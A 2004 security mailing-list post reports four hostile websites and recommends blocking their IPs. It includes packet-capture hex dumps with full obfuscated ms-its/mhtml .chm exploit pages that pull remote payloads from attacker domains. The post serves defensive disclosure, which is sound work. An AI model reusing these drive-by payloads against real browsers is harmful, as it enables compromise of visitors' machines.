[Intrusions] obfuscated ms-its/.chm hostile web page attacks

Tue Jul 27 20:40:41 GMT 2004

There are a few "reputable" websites that use the
ms-its protocol, but not many.  The ones that
obfuscate their invocation of this protocol are
presumptively not reputable.  On the basis of the
following captures, I suggest shunning 64.159.79.20,
38.113.1.157, 66.98.144.21, and 69.20.51.244

Some of them are lifting obfuscation techniques
directly from POC discussions along the lines of, "If
I wanted to be evil, I could obfuscate this as
follows..."  One uses more elaborate techniques as
well.

Basic:
69.20.51.244
66.98.144.21
64.159.79.20

more involved:
38.113.1.157

reference (one of many):
http://www.securityfocus.com/bid/9320/info/
---
13:23:47.253309 64.159.79.20.80 > W.X.Y.Z.4811: P [tcp
sum ok] 1143801791:1143802515()
  0000: 4500 02fc da00 4000 3606 XXXX 409f 4f14 
E..üÚ. at .6.Å. at .O.
  0010: WX YZ 0050 12cb 442d 07bf 0564 8202 
¨.j&.P.ËD-.¿.d..
  0020: 5018 1920 d81a 0000 4854 5450 2f31 2e31  P..
Ø...HTTP/1.1
  0030: 2032 3030 204f 4b0d 0a44 6174 653a 2046   200
OK..Date: F
  0040: 7269 2c20 3136 204a 756c 2032 3030 3420  ri,
16 Jul 2004
  0050: 3230 3a32 373a 3136 2047 4d54 0d0a 5365 
20:27:16 GMT..Se
  0060: 7276 6572 3a20 4170 6163 6865 2f31 2e33  rver:
Apache/1.3
  0070: 2e32 3820 2855 6e69 7829 2050 4850 2f34  .28
(Unix) PHP/4
  0080: 2e33 2e31 0d0a 4c61 7374 2d4d 6f64 6966 
.3.1..Last-Modif
  0090: 6965 643a 2046 7269 2c20 3039 204a 756c  ied:
Fri, 09 Jul
  00a0: 2032 3030 3420 3139 3a31 333a 3131 2047   2004
19:13:11 G
  00b0: 4d54 0d0a 4554 6167 3a20 2233 3738 3533 
MT..ETag: "37853
  00c0: 312d 3161 642d 3430 6565 6565 3437 220d 
1-1ad-40eeee47".
  00d0: 0a41 6363 6570 742d 5261 6e67 6573 3a20 
.Accept-Ranges:
  00e0: 6279 7465 730d 0a43 6f6e 7465 6e74 2d4c 
bytes..Content-L
  00f0: 656e 6774 683a 2034 3239 0d0a 4b65 6570 
ength: 429..Keep
  0100: 2d41 6c69 7665 3a20 7469 6d65 6f75 743d 
-Alive: timeout=
  0110: 352c 206d 6178 3d31 3030 0d0a 436f 6e6e  5,
max=100..Conn
  0120: 6563 7469 6f6e 3a20 4b65 6570 2d41 6c69 
ection: Keep-Ali
  0130: 7665 0d0a 436f 6e74 656e 742d 5479 7065 
ve..Content-Type
  0140: 3a20 7465 7874 2f68 746d 6c0d 0a0d 0a0d  :
text/html.....
  0150: 0a3c 2144 4f43 5459 5045 2048 544d 4c20 
.<!DOCTYPE HTML
  0160: 5055 424c 4943 2022 2d2f 2f57 3343 2f2f 
PUBLIC "-//W3C//
  0170: 4454 4420 4854 4d4c 2034 2e30 2054 7261  DTD
HTML 4.0 Tra
  0180: 6e73 6974 696f 6e61 6c2f 2f45 4e22 3e0d 
nsitional//EN">.
  0190: 0a0d 0a3c 6874 6d6c 3e0d 0a3c 6865 6164 
...<html>..<head
  01a0: 3e0d 0a09 3c74 6974 6c65 3e77 6169 742e 
>...<title>wait.
  01b0: 2e2e 3c2f 7469 746c 653e 0d0a 3c2f 6865 
..</title>..</he
  01c0: 6164 3e0d 0a0d 0a3c 626f 6479 3e0d 0a0d 
ad>....<body>...
  01d0: 0a3c 5445 5854 4152 4541 2069 643d 6378 
.<TEXTAREA id=cx
  01e0: 7720 7374 796c 653d 2244 4953 504c 4159  w
style="DISPLAY
  01f0: 3a20 6e6f 6e65 223e 3c6f 626a 6563 7420  :
none"><object
  0200: 6461 7461 3d22 247b 5052 7d22 2074 7970 
data="${PR}" typ
  0210: 653d 2274 6578 742f 782d 7363 7269 7074 
e="text/x-script
  0220: 6c65 7422 2077 6964 7468 3d22 3022 2068  let"
width="0" h
  0230: 6569 6768 743d 2230 223e 3c2f 6f62 6a65 
eight="0"></obje
  0240: 6374 3e3c 2f54 4558 5441 5245 413e 3c53 
ct></TEXTAREA><S
  0250: 4352 4950 543e 646f 6375 6d65 6e74 2e77 
CRIPT>document.w
  0260: 7269 7465 2863 7877 2e76 616c 7565 2e72 
rite(cxw.value.r
  0270: 6570 6c61 6365 2822 247b 5052 7d22 2c22 
eplace("${PR}","
  0280: 2623 3130 393b 732d 6974 733a 2623 3130 
&#109;s-its:&#10
  0290: 393b 6874 6d6c 3a66 696c 653a 2f2f 633a 
9;html:file://c:
  02a0: 5c5c 6e6f 7375 6368 2e6d 6874 2168 7474 
\\nosuch.mht!htt
  02b0: 703a 2f2f 7777 772e 7573 7469 6d65 727a 
p://www.ustimerz
  02c0: 2e63 6f6d 2f74 6d31 3131 3132 2f76 6172 
.com/tm11112/var
  02d0: 312e 6368 6d3a 3a2f 312e 6874 6d22 2929 
1.chm::/1.htm"))
  02e0: 3b3c 2f53 4352 4950 543e 0d0a 3c2f 626f 
;</SCRIPT>..</bo
  02f0: 6479 3e0d 0a3c 2f68 746d 6c3e           
dy>..</html>

--------------------
13:26:20.500282 38.113.1.157.80 > W.X.Y.Z.1069: P [tcp
sum ok] 430:916(486) ack 423 )
  0000: 4500 020e 4b09 4000 2e06 XXXX 2671 019d 
E...K. at ...Æ¥&q..
  0010: WX YZ 0050 042d 5f04 a197 cfd0 a1c5 
¨.h..P.-_.¡.ÏÐ¡Å
  0020: 5018 1d50 c907 0000 4854 5450 2f31 2e31 
P..PÉ...HTTP/1.1
  0030: 2032 3030 204f 4b0d 0a44 6174 653a 2054   200
OK..Date: T
  0040: 6875 2c20 3232 204a 756c 2032 3030 3420  hu,
22 Jul 2004
  0050: 3230 3a32 363a 3330 2047 4d54 0d0a 5365 
20:26:30 GMT..Se
  0060: 7276 6572 3a20 4170 6163 6865 0d0a 4c61  rver:
Apache..La
  0070: 7374 2d4d 6f64 6966 6965 643a 2053 756e 
st-Modified: Sun
  0080: 2c20 3138 204a 756c 2032 3030 3420 3032  , 18
Jul 2004 02
  0090: 3a34 343a 3436 2047 4d54 0d0a 4554 6167 
:44:46 GMT..ETag
  00a0: 3a20 2232 3963 3934 6631 2d65 642d 3430  :
"29c94f1-ed-40
  00b0: 6639 6534 3165 220d 0a43 6f6e 7465 6e74 
f9e41e"..Content
  00c0: 2d4c 656e 6774 683a 2032 3337 0d0a 4b65 
-Length: 237..Ke
  00d0: 6570 2d41 6c69 7665 3a20 7469 6d65 6f75 
ep-Alive: timeou
  00e0: 743d 312c 206d 6178 3d31 3938 0d0a 436f  t=1,
max=198..Co
  00f0: 6e6e 6563 7469 6f6e 3a20 4b65 6570 2d41 
nnection: Keep-A
  0100: 6c69 7665 0d0a 436f 6e74 656e 742d 5479 
live..Content-Ty
  0110: 7065 3a20 7465 7874 2f68 746d 6c0d 0a0d  pe:
text/html...
  0120: 0a3c 7363 7269 7074 3e0d 0a64 6f63 756d 
.<script>..docum
  0130: 656e 742e 7772 6974 6528 273c 6f62 6a65 
ent.write('<obje
  0140: 6374 2064 6174 613d 2226 2331 3039 3b73  ct
data="&#109;s
  0150: 2d69 7473 3a6d 6827 2b27 746d 272b 276c 
-its:mh'+'tm'+'l
  0160: 272b 273a 272b 2766 272b 2769 6c65 272b 
'+':'+'f'+'ile'+
  0170: 273a 2f2f 433a 5c5c 6627 2b27 6f6f 272b 
'://C:\\f'+'oo'+
  0180: 272e 6d68 272b 2774 2127 2b27 6874 7470 
'.mh'+'t!'+'http
  0190: 272b 273a 2f2f 7765 622d 6269 7a2d 272b 
'+'://web-biz-'+
  01a0: 2773 7475 6469 6f2e 636f 6d2f 272b 2773 
'studio.com/'+'s
  01b0: 272b 276b 272b 276d 2e63 686d 3a3a 2f69 
'+'k'+'m.chm::/i
  01c0: 6e64 6578 2e27 2b27 6874 272b 276d 2220 
ndex.'+'ht'+'m"
  01d0: 7479 272b 2770 653d 2274 6578 7427 2b27 
ty'+'pe="text'+'
  01e0: 2f78 2d27 2b27 7363 7227 2b27 6970 7427 
/x-'+'scr'+'ipt'
  01f0: 2b27 6c65 7422 3e3c 2f6f 626a 6563 743e 
+'let"></object>
  0200: 2729 3b0d 0a3c 2f73 6372 6970 743e      
');..</script>

-----------------------------
15:34:03.963005 66.98.144.21.80 > W.X.Y.Z.1973: P [tcp
sum ok] 314083024:314083697(6)
  0000: 4500 02c9 84a2 4000 3406 XXXX 4262 9015 
E..É.¢@.4.ÝÌBb..
  0010: WX YZ 0050 07b5 12b8 86d0 ed43 eee6 
¨.f¬.P.µ.¸.ÐíCîæ
  0020: 5018 1920 499e 0000 4854 5450 2f31 2e31  P..
I...HTTP/1.1
  0030: 2032 3030 204f 4b0d 0a44 6174 653a 204d   200
OK..Date: M
  0040: 6f6e 2c20 3139 204a 756c 2032 3030 3420  on,
19 Jul 2004
  0050: 3232 3a33 343a 3133 2047 4d54 0d0a 5365 
22:34:13 GMT..Se
  0060: 7276 6572 3a20 4170 6163 6865 2f32 2e30  rver:
Apache/2.0
  0070: 2e34 370d 0a4c 6173 742d 4d6f 6469 6669 
.47..Last-Modifi
  0080: 6564 3a20 5468 752c 2031 3520 4a75 6c20  ed:
Thu, 15 Jul
  0090: 3230 3034 2031 353a 3037 3a32 3420 474d  2004
15:07:24 GM
  00a0: 540d 0a45 5461 673a 2022 3830 6330 3134 
T..ETag: "80c014
  00b0: 2d31 6231 2d66 3631 6333 3030 220d 0a41 
-1b1-f61c300"..A
  00c0: 6363 6570 742d 5261 6e67 6573 3a20 6279 
ccept-Ranges: by
  00d0: 7465 730d 0a43 6f6e 7465 6e74 2d4c 656e 
tes..Content-Len
  00e0: 6774 683a 2034 3333 0d0a 436f 6e6e 6563  gth:
433..Connec
  00f0: 7469 6f6e 3a20 636c 6f73 650d 0a43 6f6e  tion:
close..Con
  0100: 7465 6e74 2d54 7970 653a 2074 6578 742f 
tent-Type: text/
  0110: 6874 6d6c 0d0a 0d0a 3c68 746d 6c3e 0d0a 
html....<html>..
  0120: 3c68 6561 643e 0d0a 3c62 6f64 7920 6f6e 
<head>..<body on
  0130: 6265 666f 7265 756e 6c6f 6164 3d22 7769 
beforeunload="wi
  0140: 6e64 6f77 2e6f 7065 6e28 2768 7474 703a 
ndow.open('http:
  0150: 2f2f 706c 6169 6e2e 756e 692d 7573 2e6e 
//plain.uni-us.n
  0160: 6574 2f70 6167 6573 2f67 6f2e 6874 6d6c 
et/pages/go.html
  0170: 272c 2727 2c27 2729 3b22 3e0d 0a3c 7465 
','','');">..<te
  0180: 7874 6172 6561 2069 643d 2263 6f64 6577 
xtarea id="codew
  0190: 696e 6422 2073 7479 6c65 3d22 6469 7370  ind"
style="disp
  01a0: 6c61 793a 6e6f 6e65 3b22 3e0d 0a20 2020 
lay:none;">..
  01b0: 203c 6f62 6a65 6374 2064 6174 613d 2224  
<object data="$
  01c0: 7b50 4154 487d 2220 7479 7065 3d22 7465 
{PATH}" type="te
  01d0: 7874 2f78 2d73 6372 6970 746c 6574 223e 
xt/x-scriptlet">
  01e0: 3c2f 6f62 6a65 6374 3e0d 0a3c 2f74 6578 
</object>..</tex
  01f0: 7461 7265 613e 0d0a 3c73 6372 6970 7420 
tarea>..<script
  0200: 6c61 6e67 7561 6765 3d22 4a61 7661 5363 
language="JavaSc
  0210: 7269 7074 223e 0d0a 2020 2020 646f 6375 
ript">..    docu
  0220: 6d65 6e74 2e77 7269 7465 2863 6f64 6577 
ment.write(codew
  0230: 696e 642e 7661 6c75 652e 7265 706c 6163 
ind.value.replac
  0240: 6528 2f5c 247b 5041 5448 7d2f 672c 2726 
e(/\${PATH}/g,'&
  0250: 2331 3039 3b73 2d69 7473 3a6d 6874 6d6c 
#109;s-its:mhtml
  0260: 3a66 696c 653a 2f2f 433a 5c66 6f6f 2e6d 
:file://C:\foo.m
  0270: 6874 2168 7474 703a 2f2f 7777 7731 2e73 
ht!http://www1.s
  0280: 6d61 7274 7570 6461 7465 722e 636f 6d2f 
martupdater.com/
  0290: 726f 622f 7a33 322e 6368 6d3a 3a2f 7374 
rob/z32.chm::/st
  02a0: 6172 742e 6874 6d6c 2729 293b 0d0a 3c2f 
art.html'));..</
  02b0: 7363 7269 7074 3e0d 0a3c 2f62 6f64 793e 
script>..</body>
  02c0: 0d0a 3c2f 6874 6d6c 3e                  
..</html>

------------------------------
16:11:48.814445 69.20.51.244.80 > W.X.Y.Z.3381: P [tcp
sum ok] 482608625:482609223(598)
  0000: 4500 027e 8727 4000 3106 XXXX 4514 33f4 
E..~.'@.1.;zE.3ô
  0010: WX YZ 0050 0d35 1cc4 05f1 b384 40d6 
¨.c4.P.5.Ä.ñ³.@Ö
  0020: 5018 1920 f75e 0000 4854 5450 2f31 2e31  P..
÷^..HTTP/1.1
  0030: 2032 3030 204f 4b0d 0a44 6174 653a 2057   200
OK..Date: W
  0040: 6564 2c20 3231 204a 756c 2032 3030 3420  ed,
21 Jul 2004
  0050: 3233 3a31 313a 3538 2047 4d54 0d0a 5365 
23:11:58 GMT..Se
  0060: 7276 6572 3a20 4170 6163 6865 2f31 2e33  rver:
Apache/1.3
  0070: 2e32 3720 2855 6e69 7829 2020 2852 6564  .27
(Unix)  (Red
  0080: 2d48 6174 2f4c 696e 7578 2920 4672 6f6e 
-Hat/Linux) Fron
  0090: 7450 6167 652f 352e 302e 322e 3236 3233 
tPage/5.0.2.2623
  00a0: 206d 6f64 5f70 7974 686f 6e2f 322e 372e  
mod_python/2.7.
  00b0: 3820 5079 7468 6f6e 2f31 2e35 2e32 206d  8
Python/1.5.2 m
  00c0: 6f64 5f73 736c 2f32 2e38 2e31 3220 4f70 
od_ssl/2.8.12 Op
  00d0: 656e 5353 4c2f 302e 392e 3662 2044 4156 
enSSL/0.9.6b DAV
  00e0: 2f31 2e30 2e33 2050 4850 2f34 2e33 2e36 
/1.0.3 PHP/4.3.6
  00f0: 206d 6f64 5f70 6572 6c2f 312e 3236 206d  
mod_perl/1.26 m
  0100: 6f64 5f77 6562 6170 702f 312e 322e 302d 
od_webapp/1.2.0-
  0110: 6465 760d 0a58 2d50 6f77 6572 6564 2d42 
dev..X-Powered-B
  0120: 793a 2050 4850 2f34 2e33 2e36 0d0a 436f  y:
PHP/4.3.6..Co
  0130: 6e6e 6563 7469 6f6e 3a20 636c 6f73 650d 
nnection: close.
  0140: 0a54 7261 6e73 6665 722d 456e 636f 6469 
.Transfer-Encodi
  0150: 6e67 3a20 6368 756e 6b65 640d 0a43 6f6e  ng:
chunked..Con
  0160: 7465 6e74 2d54 7970 653a 2074 6578 742f 
tent-Type: text/
  0170: 6874 6d6c 0d0a 0d0a 6661 200d 0a3c 7363 
html....fa ..<sc
  0180: 7269 7074 3e0d 0a64 6f63 756d 656e 742e 
ript>..document.
  0190: 7772 6974 6528 273c 6f62 6a65 6374 2064 
write('<object d
  01a0: 6174 613d 2226 2331 3039 3b73 2d69 7473 
ata="&#109;s-its
  01b0: 3a6d 6827 2b27 746d 272b 276c 272b 273a 
:mh'+'tm'+'l'+':
  01c0: 272b 2766 272b 2769 6c65 272b 273a 2f2f 
'+'f'+'ile'+'://
  01d0: 433a 5c5c 6627 2b27 6f6f 272b 272e 6d68 
C:\\f'+'oo'+'.mh
  01e0: 272b 2774 2127 2b27 6874 7470 272b 273a 
'+'t!'+'http'+':
  01f0: 2f2f 7777 772e 6a69 7661 272b 2763 7265 
//www.jiva'+'cre
  0200: 6174 6976 652e 636f 6d2f 696d 6167 6573 
ative.com/images
  0210: 2f69 636f 6e73 2f27 2b27 7527 2b27 7327 
/icons/'+'u'+'s'
  0220: 2b27 612e 6368 6d3a 3a2f 312e 272b 2768 
+'a.chm::/1.'+'h
  0230: 7427 2b27 6d22 2074 7927 2b27 7065 3d22 
t'+'m" ty'+'pe="
  0240: 7465 7874 272b 272f 782d 272b 2773 6372 
text'+'/x-'+'scr
  0250: 272b 2769 7074 272b 276c 6574 223e 3c2f 
'+'ipt'+'let"></
  0260: 6f62 6a65 6374 3e27 293b 0d0a 3c2f 7363 
object>');..</sc
  0270: 7269 7074 3e0d 0a0d 0a30 0d0a 0d0a      
ript>....0....

__________________________________
Do you Yahoo!?
Y! Messenger - Communicate in real time. Download now. 
http://messenger.yahoo.com